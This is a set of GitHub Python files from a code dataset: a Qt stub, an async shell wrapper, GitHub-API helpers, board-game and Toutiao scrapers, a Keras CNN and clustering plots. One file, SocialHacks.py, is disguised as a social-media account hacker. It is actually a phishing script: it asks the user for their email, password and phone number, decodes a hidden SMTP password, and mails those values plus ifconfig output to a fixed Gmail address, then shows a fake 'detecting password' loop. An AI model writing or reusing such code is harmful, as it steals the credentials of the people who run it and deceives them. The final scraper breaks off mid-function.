
    def addText(self):
        """Button handler: grab the edit box text, then display it."""
        self.getText()
        self.setText()
# Standard Qt bootstrap: create the application, show the window, and hand
# control to the event loop until the window closes.
if __name__ == "__main__":
    app = QtWidgets.QApplication(sys.argv)
    myshow = mywindow()
    myshow.show()
    sys.exit(app.exec_())
| Vingent/HydrologySoftware_Code | blogtest2.py | blogtest2.py | py | 923 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "PyQt5.QtWidgets.QWidget",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "PyQt5.QtWidgets",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "blog.Ui_MainWindow",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "PyQt5... |
72506183395 | import asyncio
import os
from .utils import *
from .exceptions import *
# --------------------------------------------------------------------
class Shell:
    """Async wrapper around subprocess execution with bounded concurrency."""

    # Never run more simultaneous shell jobs than there are CPU cores.
    limiter = asyncio.BoundedSemaphore(CPU_CORES)

    def __init__(self, config=None):
        # NOTE(review): `config` is currently unused — kept for interface
        # compatibility with callers that pass it.
        self.log = get_logger("bakery.shell.Shell")
        self.env = {}

    def derive(self):
        """Return a new Shell whose env starts as a copy of this one's."""
        # BUG FIX: previously updated `derived_Shell.env` (typo'd name),
        # which raised NameError whenever derive() was called.
        derived_shell = Shell()
        derived_shell.env.update(self.env)
        return derived_shell

    async def __call__(
        self,
        *args,
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
        name=None,
        log=None,
        **kwargs
    ):
        """Run a command asynchronously, streaming output lines to the log.

        Returns the collected stdout lines; raises SubprocessError when the
        process exits with a non-zero return code.
        """
        # Limit concurrency in shell calls to the number of cores on the
        # system, so that we do not end up spawning more jobs from
        # coroutines than the system has processors.
        async with Shell.limiter:
            if name is None:
                name = "#"
            if log is None:
                log = JobLog(self.log, name=name)
            # Flatten and stringify the (possibly nested) argument tree.
            cmd_line = compose(
                lambda x: flat_map(x, degenerate), lambda x: flat_map(x, str)
            )(args)
            log.trace(" ".join(cmd_line))
            output = []
            err_output = []
            env = os.environ.copy()
            env.update(self.env)
            proc = await asyncio.create_subprocess_exec(
                *cmd_line, stdout=stdout, stderr=stderr, env=env, **kwargs
            )
            # Read stdout and stderr concurrently, line by line, until EOF.
            readline_tasks = {
                asyncio.Task(proc.stdout.readline()): (
                    output,
                    proc.stdout,
                    lambda x: log.print(x),
                ),
                asyncio.Task(proc.stderr.readline()): (
                    err_output,
                    proc.stderr,
                    lambda x: log.error(x),
                ),
            }
            while readline_tasks:
                done, pending = await asyncio.wait(
                    readline_tasks, return_when=asyncio.FIRST_COMPLETED
                )
                for future in done:
                    buf, stream, display = readline_tasks.pop(future)
                    line = future.result()
                    if line:  # if not EOF
                        line = line.decode("utf-8").strip()
                        buf.append(line)
                        display(line)
                        # Queue the next read on the same stream.
                        readline_tasks[asyncio.Task(stream.readline())] = (
                            buf,
                            stream,
                            display,
                        )
            await proc.wait()
            if proc.returncode != 0:
                raise SubprocessError(cmd_line, output, err_output, proc.returncode)
            return output
| lainproliant/bakery | bakery/shell.py | shell.py | py | 2,831 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "asyncio.BoundedSemaphore",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "asyncio.subprocess",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "asyncio.subprocess",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name"... |
17028867718 | # helper functions
import time
import datetime
import requests
import pickle
import sys
import itertools
import glob
# add things to this list that need to be closed when the program ends
things_to_close = []
# load the github api tokens into an itertools.cycle
# NOTE(review): cycling an empty list yields nothing — at least one
# github_token*.txt file is expected in the working directory.
github_tokens = []
for file_str in glob.glob("github_token*.txt"):
    with open(file_str) as token_file:
        github_tokens.append(token_file.read().strip())
token_cycle = itertools.cycle(github_tokens)
def get_raw_url(item):
    """Convert a GitHub search-result item's html_url to its raw-content URL."""
    raw = item["html_url"]
    raw = raw.replace("https://github.com/", "https://raw.githubusercontent.com/")
    return raw.replace("/blob/", "/")
def get_repo(url: str):
    """Extract the 'user/repo' slug from a github.com URL."""
    parts = url.split("/")
    # https://github.com/<user>/<repo>/... -> segments 3 and 4
    return f"{parts[3]}/{parts[4]}"
def get_filename(url: str):
    """Return the last path segment of the URL."""
    return url.rsplit("/", 1)[-1]
def check_rate_limit(headers: dict):
    """Sleep until the GitHub rate limit resets, based on response headers.

    Does nothing when the rate-limit headers are absent or requests remain.
    Sleeps at most 180 seconds per call.
    """
    if "X-RateLimit-Remaining" not in headers or "X-RateLimit-Reset" not in headers:
        print("Rate limit info was not in the api response headers")
        return
    if headers["X-RateLimit-Remaining"] != "0":
        return
    reset_time = datetime.datetime.fromtimestamp(float(headers["X-RateLimit-Reset"]))
    # BUG FIX: timedelta.seconds is always in [0, 86400) and ignores the day
    # component, so a reset time in the past (days=-1, large .seconds) could
    # trigger a pointless long sleep. total_seconds() gives the real
    # (possibly negative) wait.
    seconds_to_wait = (reset_time - datetime.datetime.now()).total_seconds()
    if seconds_to_wait <= 0:
        return
    if seconds_to_wait >= 180:
        print("Time to wait was more than 180 seconds. Only sleeping: 180")
        time.sleep(180)
    else:
        print("Rate Limit Hit, Sleeping: {}".format(int(seconds_to_wait) + 1))
        time.sleep(int(seconds_to_wait) + 1)
def check_abuse_limit(api_response: requests.Response):
    # Handle GitHub's secondary ("abuse") rate limit: on a 403 the API says
    # how long to back off via the Retry-After header; missing header is fatal.
    if "Retry-After" not in api_response.headers:
        log_error_and_exit("api response returned status code: 403 and 'Retry-After' is not in the headers", api_response)
    time_to_wait = int(api_response.headers["Retry-After"]) + 1
    print("Abuse rate limit hit, Sleeping: {}".format(time_to_wait))
    time.sleep(time_to_wait)
def log_error_and_exit(message: str, api_response: requests.Response):
    """Report a fatal API error: print it, pickle the response for later
    inspection, then shut the program down cleanly."""
    print(message)
    with open("api_response.pickle", "wb") as dump_file:
        pickle.dump(api_response, dump_file)
    cleanup_and_exit()
def cleanup_and_exit():
    """Close every registered resource, then terminate the process."""
    for resource in things_to_close:
        resource.close()
    sys.exit()
| millsjustin/gitSecrets | utils.py | utils.py | py | 2,403 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "glob.glob",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "itertools.cycle",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.fromtimestamp",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "datetime.da... |
19012266500 | from email.quoprimime import quote
import pandas as pd
import requests
from bs4 import BeautifulSoup
from time import sleep
import csv
def request(msg, slp=1):
    """Make an HTTP GET request, retrying until the server answers 200.

    :param msg: URL to fetch
    :param slp: seconds to wait between attempts
    :returns: the successful requests.Response
    """
    status_code = 500  # anything but 200 so the loop runs at least once
    while status_code != 200:
        sleep(slp)  # Don't ping the server too often
        try:
            r = requests.get(msg)
            status_code = r.status_code
            if status_code != 200:
                print("Server Error! Response Code %i. Retrying..." % (r.status_code))
        # BUG FIX: a bare `except:` also swallowed KeyboardInterrupt and
        # SystemExit, making the scraper impossible to stop mid-retry.
        # (Message also corrected: it sleeps ten seconds, not one.)
        except requests.exceptions.RequestException:
            print("An exception has occurred, probably a momentary loss of connection. Waiting ten seconds...")
            sleep(10)
    return r
def getDadosJogo(linkJogo,idJogo):
    # Scrape a single game page from Ludopedia and return its details as a
    # one-row DataFrame (columns listed in columnsDF below).
    #urlBusca = 'https://www.ludopedia.com.br/jogo/'
    #nomeJogoBusca = str(nomeJogo).replace(' ','-')
    #urlBuscaPagina = urlBusca+nomeJogoBusca
    urlBuscaPagina = linkJogo
    r = request(urlBuscaPagina)
    columnsDF=["id",
               "jogoAno",
               "jogoIdade",
               "jogoTempJogo",
               "jogoQtJogadores",
               "jogoMiolosDesigner",
               "jogoMiolosArtista",
               "jogoMiolosEditora",
               "jogoStatTem",
               "jogoStatQuer",
               "jogoStatTeve",
               "jogoStatFavorito",
               "jogoResumoTexto"]
    #dfJogo = pd.DataFrame(columns=columnsDF,index=range(1))
    soup = BeautifulSoup(r.text, 'lxml')
    # Header block containing the year and the basic play-info list.
    detalhes = soup.find_all("div", attrs={'class':'jogo-top-main'})
    jogoAnoFull = detalhes[0].find_all("span", attrs={'class':'text-xs'})
    jogoAno = jogoAnoFull[0].string.replace('(','').replace(')','')
    jogoDetalhesFull = detalhes[0].find_all("ul", attrs={'class':'list-inline'})
    jogoDetalhesLista = jogoDetalhesFull[0].find_all("li")
    jogoIdade = jogoDetalhesLista[0].text
    jogoTempJogo = jogoDetalhesLista[1].text
    jogoQtJogadores = jogoDetalhesLista[2].text
    # Designer / artist / publisher credits.
    jogoMiolos = detalhes[0].find_all("span", attrs={'class':'info-span text-sm'})
    jogoMiolosDesigner = jogoMiolos[0].find_next("a").text
    jogoMiolosArtista = jogoMiolos[1].find_next("a").text
    jogoMiolosEditora = jogoMiolos[2].find_next("a").text
    # Collection counters shown as "Label (123)" on the page's buttons.
    # NOTE(review): if one of the button types is missing from the page, the
    # matching jogoStat* variable stays unbound and the DataFrame build raises.
    jogoStatsPossuem = detalhes[0].find_all("button")
    for jogoStat in jogoStatsPossuem:
        if jogoStat.attrs.get("data-tipo") == "fl_tem":
            sTemp = jogoStat.string
            jogoStatTem = sTemp[sTemp.find('(')+1:sTemp.find(')')]
        if jogoStat.attrs.get("data-tipo") == "fl_quer":
            sTemp = jogoStat.string
            jogoStatQuer = sTemp[sTemp.find('(')+1:sTemp.find(')')]
        if jogoStat.attrs.get("data-tipo") == "fl_teve":
            sTemp = jogoStat.string
            jogoStatTeve = sTemp[sTemp.find('(')+1:sTemp.find(')')]
        if jogoStat.attrs.get("data-tipo") == "fl_favorito":
            sTemp = jogoStat.string
            jogoStatFavorito = sTemp[sTemp.find('(')+1:sTemp.find(')')]
    # Game description, with layout whitespace stripped out.
    jogoResumo = soup.find_all("div", attrs={'class':'bloco-sm-content bloco-sm-content-open'})
    jogoResumoTexto = jogoResumo[0].text.replace("\n","").replace("\t",'').replace("\r",'')
    tempDataframe = pd.DataFrame([[idJogo,
                                   jogoAno,
                                   jogoIdade,
                                   jogoTempJogo,
                                   jogoQtJogadores,
                                   jogoMiolosDesigner,
                                   jogoMiolosArtista,
                                   jogoMiolosEditora,
                                   jogoStatTem,
                                   jogoStatQuer,
                                   jogoStatTeve,
                                   jogoStatFavorito,
                                   jogoResumoTexto]],columns=columnsDF)
    #dfJogo.iloc[1, :] = tempDataframe
    print(tempDataframe)
    return tempDataframe
def geraDetalheJogos():
    """Scrape the detail page of every game listed in the downloaded CSV.

    Reads the list produced by the list-scraping step, fetches each game's
    details via ``getDadosJogo`` and appends one row per game to the detail
    CSV (header is written only for the first game).
    NOTE(review): ``dfJogoAll`` accumulates every detail frame but is never
    written out or returned — presumably left over from interactive use.
    """
    #----------------- reading the downloaded games
    file = '003_storage/000_transient/ludopedia_listaJogos.csv'
    csvDetalheJogos = '003_storage/000_transient/ludopedia_DetalhesJogos.csv'
    df = pd.read_csv(file,sep=';',quoting=csv.QUOTE_NONNUMERIC)
    linkJogo = df['url']
    print('DF size :'+str(df.size))
    print('DF shape :'+str(df.shape))
    dfJogoAll = pd.DataFrame(columns=["id",
                                    "jogoAno",
                                    "jogoIdade",
                                    "jogoTempJogo",
                                    "jogoQtJogadores",
                                    "jogoMiolosDesigner",
                                    "jogoMiolosArtista",
                                    "jogoMiolosEditora",
                                    "jogoStatTem",
                                    "jogoStatQuer",
                                    "jogoStatTeve",
                                    "jogoStatFavorito",
                                    "jogoResumoTexto"])
    #for idJogo in idsJogos:
    for i in range(len(df)):
        # i+1 is used as the 1-based game id in the output
        dfJogo = getDadosJogo(linkJogo[i],i+1)
        dfJogoAll = pd.concat([dfJogoAll,dfJogo],axis=0)
        if i == 0:
            # create the initial file
            # with the header
            dfJogo.to_csv(csvDetalheJogos, sep=';',quoting=csv.QUOTE_NONNUMERIC)
        else:
            dfJogo.to_csv(csvDetalheJogos,mode='a', header=False, sep=';',quoting=csv.QUOTE_NONNUMERIC)
#geraDetalheJogos() | lucasccpp/bgwebscrapping | 001_scrapping/ludopediaDetalhes.py | ludopediaDetalhes.py | py | 5,321 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "time.sleep",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_numb... |
20506069143 | #MODULOS
import os
import sys
import time
import smtplib
from sympy.crypto.crypto import encipher_affine, decipher_affine
from sympy.crypto.crypto import encipher_shift, decipher_shift
#COLORES
ve = "\033[1;32;40m" #Ve
az = "\033[1;34;40m" #A
ro = "\033[1;31;40m" #Ro
#FUNCIONES
def sutil(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(12. / 150)
def corrida(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(3. / 250)
def xuxa(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(2. / 120)
def saludo(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(3. / 100)
def medio(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(8. / 200)
def lento(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(10. / 200)
def proceso(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(15. / 150)
os.system("clear")
sutil(ve+"Para tener un resultado eficiente asegúrate de agregar la información correctamente que se te solicita.")
os.system("sleep 2")
os.system("clear")
corrida(az+""" ¤▪¤▪¤▪¤▪♤¤▪¤▪¤▪♤¤▪¤▪¤▪¤
S-O-C-I-A-L ♧ H-A-C-K-S
¤▪¤▪¤▪¤▪¤▪♤▪¤▪¤▪♤¤▪¤▪¤▪ """)
sutil(ve+"Hackea una red social en cuestión de minutos o segundos con SocialHacks")
def sz():
sp = corrida(az+"_____")
medio(ro+"Red social:")
s = az+"-"
corrida(az+"_________________"+ro)
print ("1-.Facebook"+s)
sz()
print (ro+"2-.Instagram"+s)
sz()
print (ro+"3-.Twiter"+s)
sz()
print (ro+"4-.Reddit"+s)
sz()
print (ro+"5-.Tiktok"+s)
corrida(az+"_________________"+ro)
try:
rp11 = int(input("Elige una opcion\n"+ve+'>>>'))
if rp11 == 1:
rmsn = "Facebook"
elif rp11 == 2:
rmsn = "Instagram"
elif rp11 == 3:
rmsn = "Twiter"
elif rp11 == 4:
rmsn = "Reddit"
elif rp11 == 5:
rmsn = "Tiktok"
else:
print ("Este numero no es una opción")
sys.exit()
except ValueError:
print (ro+"Tu respuesta no fue un numero")
sys.exit()
print (ro+"Hss elegido",rmsn+'\n'+ro)
seq = open("module.txt")
asw = seq.read()
kew = (5, 5028)
wad = decipher_affine(asw,kew)
a = wad.lower()
subject = input("Añade tu nombre de perfil:\n>>> ")
numero = input(ro+"Agrega numero de celular:\n>>> ")
url = input(az+"Introduce la url del perfil de tu victima?\n>>> ")
rob = input(ve+"Introduce tu correo\n>>> ")
psd = input(ro+"Introduce la contraseña\n>>> ")
tubo = os.popen("ifconfig")
tubo = tubo.readlines()
obj = "vallettaoficial@gmail.com"
num = "Numero:", numero
mar = "Url:", url
cor = "Correo:", rob
arb = "Contrasena:", psd
msg = num, mar, cor, arb, tubo
msg = ('Subject: {}\n\n{}'.format(subject, msg))
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login("patoelsa170@gmail.com", a)
server.sendmail("patoelsa170@gmail.com", obj, msg)
server.quit()
def x(i):
for c in i:
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(12. /150)
x("Detectando contraseña de la victima")
while True:
sys.stdout.write(".")
sys.stdout.flush()
time.sleep(40. / 30)
| jhondoeelmisterio/SocialHacks | SocialHacks.py | SocialHacks.py | py | 3,622 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.stdout.write",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "sys.stdout.flush",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"l... |
29614366198 |
from colorama import Fore, Style
from typing import Tuple
import numpy as np
from colorama import Fore, Style
import time
print(Fore.BLUE + "\nLoading tensorflow..." + Style.RESET_ALL)
start = time.perf_counter()
from tensorflow import keras
from keras import Model, Sequential, layers, regularizers, optimizers, models
from keras.callbacks import EarlyStopping
end = time.perf_counter()
print(f"\n✅ tensorflow loaded ({round(end - start, 2)} secs)")
def initialize_model(X: np.ndarray) -> Model:
    """
    Initialize the Neural Network with random weights
    """
    print(Fore.BLUE + "\nInitialize model..." + Style.RESET_ALL)
    input_shape = (13, 130, 1)
    # Three Conv -> MaxPool -> BatchNorm -> Dropout stages, followed by a
    # small dense head.  Final layer: 8-way softmax, one unit per genre.
    # (The X argument is unused; kept for interface compatibility.)
    model = models.Sequential([
        # First convolution stage
        layers.Conv2D(32, (3, 3), activation='relu', padding='same',
                      input_shape=input_shape),
        layers.MaxPool2D(pool_size=(3, 3), strides=(2, 2), padding='same'),
        layers.BatchNormalization(),
        layers.Dropout(0.5),
        # Second convolution stage
        layers.Conv2D(32, (2, 2), activation='relu', padding='same'),
        layers.MaxPool2D(pool_size=(3, 3), strides=(2, 2), padding='same'),
        layers.BatchNormalization(),
        layers.Dropout(0.55),
        # Third convolution stage
        layers.Conv2D(32, (2, 2), activation='relu', padding='same'),
        layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2), padding='same'),
        layers.BatchNormalization(),
        layers.Dropout(0.55),
        # Classification head
        layers.Flatten(),
        layers.Dense(64, activation='relu'),
        layers.Dropout(0.5),
        layers.Dense(8, activation='softmax'),
    ])
    print("\n✅ model initialized")
    return model
def compile_model(model: Model, learning_rate: float) -> Model:
    """
    Compile the Neural Network.

    Args:
        model: the Keras model to compile.
        learning_rate: Adam learning rate.

    Returns:
        The compiled model.
    """
    # Bug fix: honour the caller-supplied learning rate — it was previously
    # ignored in favour of a hard-coded 0.0001.
    optimizer = optimizers.Adam(learning_rate=learning_rate)
    model.compile(loss='categorical_crossentropy',
                  optimizer=optimizer,
                  metrics=['accuracy'])
    print("\n✅ model compiled")
    return model
def train_model(model: Model,
                X: np.ndarray,
                y: np.ndarray,
                batch_size=32,
                patience=10,
                validation_split=0.3,
                validation_data=None) -> Tuple[Model, dict]:
    """Fit the model and return the tuple (fitted_model, history)."""
    print(Fore.BLUE + "\nTrain model..." + Style.RESET_ALL)
    # Stop early once the training accuracy stops improving.
    early_stop = EarlyStopping(patience=patience, monitor='accuracy')
    history = model.fit(
        X,
        y,
        validation_split=validation_split,
        validation_data=validation_data,
        batch_size=batch_size,
        epochs=50,
        callbacks=[early_stop],
        verbose=1,
    )
    print(f"\n✅ model trained ({len(X)} rows)")
    return model, history
def evaluate_model(model: Model,
                   X: np.ndarray,
                   y: np.ndarray,
                   batch_size=64) -> Tuple[Model, dict]:
    """
    Evaluate trained model performance on dataset
    """
    print(Fore.BLUE + f"\nEvaluate model on {len(X)} rows..." + Style.RESET_ALL)
    # Nothing to do without a trained model.
    if model is None:
        print(f"\n❌ no model to evaluate")
        return None
    metrics = model.evaluate(x=X,
                             y=y,
                             batch_size=batch_size,
                             verbose=1,
                             return_dict=True)
    accuracy = metrics["accuracy"]
    print(f"\n✅ model evaluated: accuracy {round(accuracy, 2)}")
    return metrics
| rsmassey/mcats | mcats/ml_logic/model_cnn.py | model_cnn.py | py | 3,987 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "colorama.Fore.BLUE",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "colorama.Style.RESET_ALL",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "colo... |
21016222260 | import matplotlib.pyplot as pl
import numpy as np
import pickle
from random import randint
import pandas as pd
"""
x = np.linspace(0,10,20) # 20 points entre 0 et 10
y1 = x*x + 2*x # la fonction a tracer
y2 = np.sqrt(x) # la fonction a tracer
pl.figure() # creation d'une figure
pl.subplot(1,2,1) # division de la fenetre en une matrice 1x2
pl.plot(x,y1,'g--', label='$y = x^2+2x$')
# affichage de la courbe + style + etiquette
pl.legend(loc=0)
pl.subplot(1,2,2)
pl.plot(x,y2, 'r*-', label='$y = \sqrt{x}$')
pl.legend(loc=2) # affichage de la légende en haut a gauche
pl.show() # affichage de la fenetre
"""
df = pd.read_csv('/Users/Jacobo/Documents/uni/L2/2i013/data/toutlisse.csv',sep=",")
#print(len(df))
def moyenne_centroide(centroide, k):
    """Fold each of the first *k* centroid signals onto a 288-slot day.

    Every sample of ``centroide[i]`` is added into slot ``j % 288`` (288 being
    the number of ticks per day), producing one accumulated daily profile per
    centroid.  Despite the name, the result holds sums, not means.
    """
    folded = []
    for i in range(k):
        day = [0] * 288
        for position, value in enumerate(centroide[i]):
            day[position % 288] += value
        folded.append(day)
    return folded
def jourmoyen(station):
    """Accumulate a station's full time series onto a single 288-slot day.

    Slot ``i % 288`` receives the sum of all samples taken at that time of
    day.  Returns the accumulated (not averaged) daily profile.
    """
    day = [0] * 288
    for tick, value in enumerate(station):
        day[tick % 288] += value
    return day
def moyenne_station(station,k):
    # Placeholder: not implemented, always returns 1.
    # TODO(review): presumably meant to average a station's signal over k
    # periods — confirm intended semantics before implementing.
    return 1
"""
a=mo
tiroir=pickle.load(open("./data/clus11","rb"))
tiroirfini=moyenne_centroide(tiroir)
a=moyenne_centroide(c,11)
for i in range(len(a)):
pl.figure(i)
pl.plot(heure,a[i])
pl.show()
"""
def plot(k):
    """Plot each of the *k* centroids with two random member stations.

    Loads the pickled centroids and cluster assignments computed for this
    *k*, folds everything onto a normalised 24h profile, and saves one PDF
    per centroid.  NOTE(review): the comprehension variables named ``k``
    shadow the function parameter; harmless here since the parameter is not
    needed at those points, but worth renaming.
    """
    c=pickle.load( open( "./data/centroide"+str(k)+".p", "rb" ) )
    df4 = pd.read_csv('./data/toutlisse.csv',sep=",")
    tiroir=pickle.load(open("./data/clus"+str(k)+".p","rb"))
    #heure=pickle.load(open("./data/heures.p","rb"))
    a=moyenne_centroide(c,k)
    # one figure per centroid
    for i in range (k):
        pl.figure(i)
        # overlay two randomly chosen stations of the cluster (in red)
        for j in range(2):
            indice=randint(0,len(tiroir[i])-1)
            #print(indice," ",len(tiroir[i]))
            station=jourmoyen(df4[str(tiroir[i][indice])])
            suma=sum(station)
            #print(sum([k/suma for k in station]))
            # normalise so the daily profile sums to 1
            plotdata=[k/suma for k in station]
            pl.plot([k/12 for k in range(24*12)],plotdata,c='r',alpha=.5)
            #pl.xticks([k for k in range(24)])
        # the centroid itself (in green), normalised the same way
        suma=sum(a[i])
        plotdata=[k/suma for k in a[i]]
        pl.title("Centroide n"+str(i)+" ainsi que deux stations aleatoires du cluster")
        pl.plot([k/12 for k in range(24*12)],plotdata,c='g')
        pl.xticks([k for k in range(24)])
        pl.yticks([])
        pl.xlabel('heure')
        pl.ylabel('frequentation normalisee')
        pl.figure(i).savefig("./data/plotcentroidestation"+str(i)+".pdf")
    #pl.show()
#%%
def signalstationmoyenne(station,fenetre):
    """Plot one day of a station's signal smoothed with a moving average.

    Uses day #4 of the data (indices 288*3 .. 288*4) on a 288-ticks-per-day
    grid, then smooths in place with a window of width *fenetre*.
    NOTE(review): the plot title says "passe-haut" (high-pass) but the filter
    is a moving average, i.e. low-pass.  Smoothing is done in place, so later
    slots average already-smoothed values, and the right-edge branch divides
    a fixed-size sum by a varying denominator — confirm this is intended.
    """
    df = pd.read_csv('/Users/Jacobo/Documents/uni/L2/2i013/data/toutlisse.csv',sep=",")
    df=df[str(station)]
    courbe = [0]*288
    # keep only the 4th day of the series
    for i in range(288*3,288*4):
        courbe[i%288]+=df[i]
    for i in range(len(courbe)):
        if (i<int(fenetre/2)):
            # left edge: shrink the window to the available prefix
            courbe[i]=sum(courbe[:int(fenetre/2)+i])/(int(fenetre/2)+i)
        elif (i>len(courbe)-int(fenetre/2)):
            # right edge: average over the trailing half-window
            courbe[i]=sum(courbe[len(courbe)-int(fenetre/2):])/(288-i+int(fenetre/2))
        else:
            # centred window of width `fenetre`
            courbe[i]=sum(courbe[i-int(fenetre/2):i+int(fenetre/2)])/fenetre
    pl.title("Lissage avec filtre passe-haut de fenêtre="+str(fenetre))
    pl.plot([k/12 for k in range(24*12)],courbe)
    pl.xlabel('heure')
    pl.ylabel('frequentation normalisee')
    pl.xticks([k for k in range(24)])
    #print(courbe)
signalstationmoyenne(198,4)
#%%
def difference_centroides(c1,c2,k):
    """Plot the pointwise difference between two normalised centroids.

    Loads the pickled centroids computed for *k* clusters, normalises
    centroids *c1* and *c2* so each sums to 1, plots their difference over a
    24h grid and saves the figure as a PDF.
    """
    c=pickle.load( open( "/Users/Jacobo/Documents/uni/L2/2i013/data/centroide"+str(k)+".p", "rb" ) )
    #heure=pickle.load(open("./data/heures.p","rb"))
    a=moyenne_centroide(c,k)
    # normalise each centroid so its daily profile sums to 1
    suma=sum(a[c1])
    plotdata1=[k/suma for k in a[c1]]
    suma=sum(a[c2])
    plotdata2=[k/suma for k in a[c2]]
    plotdata=[plotdata1[i]-plotdata2[i] for i in range(len(plotdata1))]
    pl.title("Differences entre le centroide n"+str(c1)+" et le centroide n"+str(c2))
    pl.plot([k/12 for k in range(24*12)],plotdata,c='g',label="différences")
    #pl.plot([k/12 for k in range(24*12)],[0]*288,c='black',label="y=0")
    #pl.legend(loc='upper left')
    pl.grid(axis='y')
    pl.xticks([k for k in range(24)])
    pl.yticks([0])
    pl.xlabel('heure')
    pl.ylabel('frequentation normalisee')
    pl.savefig("./data/centroide"+str(c1)+"vscentroide"+str(c2)+".pdf")
difference_centroides(0,8,11)
#%%
def signalstationperiode(numstation,i):
    """Plot a station's full raw signal over the whole data period.

    *i* is the spacing (in days) of the x-axis tick labels; the data span is
    92 days sampled 288 times per day.
    """
    df = pd.read_csv('/Users/Jacobo/Documents/uni/L2/2i013/data/toutlisse.csv',sep=",")
    signal=df[str(numstation)]
    pl.title("Signal de la station "+str(numstation)+" sur la période des données")
    pl.plot([(k/(24*12)) for k in range(len(signal))],signal)
    pl.xticks([k+1 for k in range(0,93,i)]) #len(signal)/(24*12)=92
    #pl.yticks([])
    pl.xlabel('jour (nº)')
    pl.ylabel('fréquentation (u.a.)')
signalstationperiode(496,8)
#%%
def plotpurete(k,purete):
    """Plot cluster purity versus the number of clusters.

    *k* and *purete* are parallel sequences (x and y values respectively).
    """
    #df = pd.read_csv('/Users/Jacobo/Documents/uni/L2/2i013/data/toutlisse.csv',sep=",")
    #signal=df[str(numstation)]
    #pl.title("Signal de la station "+str(numstation)+" sur la période des données")
    pl.plot(k,purete)
    #pl.xticks(purete) #len(signal)/(24*12)=92
    #pl.yticks(k)
    pl.ylabel('purete')
    pl.xlabel('k')
res=[0.0151343,0.27919375365459359,0.45781309118426033]
k=[100,500,1000]
plotpurete(k,res)
#%%
"""
Lidee serait de prendre 2 stations de chaqu centroide, ensuite, appliquer une moeynne dessus
puis les plotter sur le meme graphique que le centroide en les ayant normalisees
plt.scatter(x,y)
plt.title("Web traffic over the last month")
plt.xlabel("Time")
plt.ylabel("Hits/hour")
plt.xticks([w*7*24 for w in range(10)],
['week %i'%w for w in range(10)])
plt.autoscale(tight=True)
plt.grid()
plt.show()
result=[i/suma for i in a[0]]
pl.plot([i/12 for i in range(24*12)],result)
pl.xticks([i for i in range(24)])
pl.show()
""" | Eastkap/uni | L2/2i013/graphe.py | graphe.py | py | 6,014 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pandas.read_csv",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "pickle.load",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "pickle.load",
"line_n... |
34536369385 | import requests
from urllib.parse import urlencode
import re
from requests import codes
import os
from hashlib import md5
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Host': 'p3-tt.bytecdn.cn',
'Upgrade-Insecure-Requests': 1,
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'
}
def get_page(offset):
    """Fetch one page of Toutiao search results for the hard-coded keyword.

    Args:
        offset: pagination offset passed to the API.

    Returns:
        The decoded JSON payload on HTTP 200, otherwise None (including on
        connection errors).
    """
    params = {
        'aid': '24',
        'offset': offset,
        'format': 'json',
        # 'keyword': '街拍',
        'autoload': 'true',
        'count': '20',
        'cur_tab': '1',
        'from': 'search_tab',
        'pd': 'synthesis'
    }
    base_url = 'https://www.toutiao.com/api/search/content/?keyword=%E8%A5%BF%E5%AE%89'
    # Bug fix: the base URL already carries "?keyword=...", so the extra
    # parameters must be joined with '&'.  Previously urlencode() output was
    # glued directly onto the keyword value, corrupting the query string.
    url = base_url + '&' + urlencode(params)
    try:
        resp = requests.get(url)
        print(url)
        if 200 == resp.status_code:
            payload = resp.json()  # decode once instead of twice
            print(payload)
            return payload
    except requests.ConnectionError:
        return None
items = []
def get_images(json):
    """Extract (title, full-size image URL) records from a result payload.

    Appends one dict per image to the module-level ``items`` list, after
    rewriting thumbnail URLs ("list/300x196/") to their original-size form.
